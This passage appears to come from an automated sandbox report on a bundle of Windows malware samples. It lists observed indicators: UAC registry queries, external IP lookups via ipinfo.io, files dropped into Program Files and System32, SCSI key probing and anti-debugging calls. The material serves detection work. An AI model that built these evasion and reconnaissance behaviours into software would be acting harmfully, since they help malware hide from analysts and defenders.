| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\QvnNIL5ksevghLY9sId6enK4.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\qfQuJDWI8e2iMeWnRendOuGg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\hoN0r0eWJkmJDk4Ic3MMAGbj.exe | N/A |
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{7207339d-f096-2b4e-9793-2c22aa486a7d}\SET79DB.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{7207339d-f096-2b4e-9793-2c22aa486a7d}\tap0901.cat | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{7207339d-f096-2b4e-9793-2c22aa486a7d}\SET79DC.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\CatRoot2\dberr.txt | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{7207339d-f096-2b4e-9793-2c22aa486a7d}\SET79DA.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{7207339d-f096-2b4e-9793-2c22aa486a7d}\SET79DA.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{7207339d-f096-2b4e-9793-2c22aa486a7d}\SET79DB.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{7207339d-f096-2b4e-9793-2c22aa486a7d}\tap0901.sys | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\drvstore.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{7207339d-f096-2b4e-9793-2c22aa486a7d}\oemvista.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{7207339d-f096-2b4e-9793-2c22aa486a7d}\SET79DC.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{7207339d-f096-2b4e-9793-2c22aa486a7d} | C:\Windows\system32\DrvInst.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\Uninstall.exe | C:\Users\Admin\Documents\7tzdBCrqnVzn34WZzl2HJIRv.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | C:\Users\Admin\AppData\Local\Temp\is-BSLVM.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\GameBox INC\Faekuxaeshoqy.exe | C:\Users\Admin\AppData\Local\Temp\is-KHGQJ.tmp\ultradumnibour.exe | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\libMaskVPN.dll | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Sofware IN LLC\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-TMPCK.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\UltraMediaBurner\is-CAKRT.tmp | C:\Users\Admin\AppData\Local\Temp\is-O6RF9.tmp\ultramediaburner.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe | C:\Users\Admin\AppData\Local\Temp\is-BSLVM.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win732\is-N3SFV.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-KC4JP.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe | C:\Users\Admin\AppData\Local\Temp\is-BSLVM.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe | C:\Users\Admin\AppData\Local\Temp\is-BSLVM.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe | C:\Users\Admin\AppData\Local\Temp\is-BSLVM.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\Sofware IN LLC\is-67BOQ.tmp | C:\Users\Admin\AppData\Local\Temp\is-TMPCK.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win764\is-S7TIB.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-IVVTP.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp32\is-B27BK.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | C:\Users\Admin\Documents\7tzdBCrqnVzn34WZzl2HJIRv.exe | N/A |
| File created | C:\Program Files (x86)\Company\NewProduct\Uninstall.ini | C:\Users\Admin\Documents\7tzdBCrqnVzn34WZzl2HJIRv.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-48MF9.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-3A2B2.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\d.INTEG.RAW | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | C:\Users\Admin\Documents\Q6X63W4DaxWwu8nlhr_IKmLa.exe | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-UE0KN.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-04KDB.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\UltraMediaBurner\is-MLQQG.tmp | C:\Users\Admin\AppData\Local\Temp\is-O6RF9.tmp\ultramediaburner.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win732\is-56ABS.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win764\is-Q0MNB.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp32\is-5OMKP.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\Company\NewProduct\tmp.edb | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | C:\Users\Admin\AppData\Local\Temp\is-BSLVM.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe | C:\Users\Admin\AppData\Local\Temp\is-BSLVM.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.ini | C:\Users\Admin\AppData\Local\Temp\is-BSLVM.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win732\is-FGODF.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\libeay32.dll | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-NLVLI.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-JTILH.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win764\is-QBADD.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\customer3.exe | C:\Users\Admin\Documents\7tzdBCrqnVzn34WZzl2HJIRv.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe | C:\Users\Admin\AppData\Local\Temp\is-BSLVM.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe | C:\Users\Admin\AppData\Local\Temp\is-BSLVM.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Sofware IN LLC\libass.dll | C:\Users\Admin\AppData\Local\Temp\is-TMPCK.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe | C:\Users\Admin\AppData\Local\Temp\is-BSLVM.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp32\is-EK8EC.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-CREDQ.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.exe | C:\Users\Admin\AppData\Local\Temp\is-BSLVM.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Sofware IN LLC\QtProfiler.exe | C:\Users\Admin\AppData\Local\Temp\is-TMPCK.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\polstore.dll | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-P2VQM.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-PF3CA.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win732\is-CJORO.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win764\is-MJBON.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\Sofware IN LLC\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-TMPCK.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-6P0EE.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe | C:\Users\Admin\AppData\Local\Temp\is-6136Q.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-3L3E6.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\Company\NewProduct\d.jfm | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Sofware IN LLC\libcueify.dll | C:\Users\Admin\AppData\Local\Temp\is-TMPCK.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\Sofware IN LLC\is-PDH86.tmp | C:\Users\Admin\AppData\Local\Temp\is-TMPCK.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-DQCOM.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp32\is-7I26P.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-543FT.tmp | C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Installer\MSID196.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| File created | C:\Windows\SystemTemp\~DFCB564044BE516524.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\LOGS\DPX\setuperr.log | C:\Windows\SysWOW64\expand.exe | N/A |
| File created | C:\Windows\Installer\f7613e2.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSICA33.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI2963.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\SystemTemp\~DFD9CC0FE48A200DED.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\inf\oem2.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\Installer\f7613e2.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DFB465C1453DAD1923.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI680E.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIDDCD.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIB3B.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIED6E.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF687.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\inf\oem2.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\LOGS\DPX\setupact.log | C:\Windows\SysWOW64\expand.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI37D5.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\AppCompat\Programs\Amcache.hve.tmp | C:\Windows\SysWOW64\WerFault.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSID65A.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIFA61.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI33B.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF364AB28D57026106.TMP | C:\Windows\system32\msiexec.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\sDbLsfKmNulpdFRqs28XqruC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\ConfigFlags | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\252N17XASxQvYmwIPdgoOr2I.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0018 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\252N17XASxQvYmwIPdgoOr2I.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Mfg | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\UpperFilters | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000 | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\CompatibleIDs | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Phantom | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Capabilities | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&135B206D&0&010000 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&135B206D&0&000000 | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&135B206D&0&010000 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\ConfigFlags | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\system32\svchost.exe | N/A |
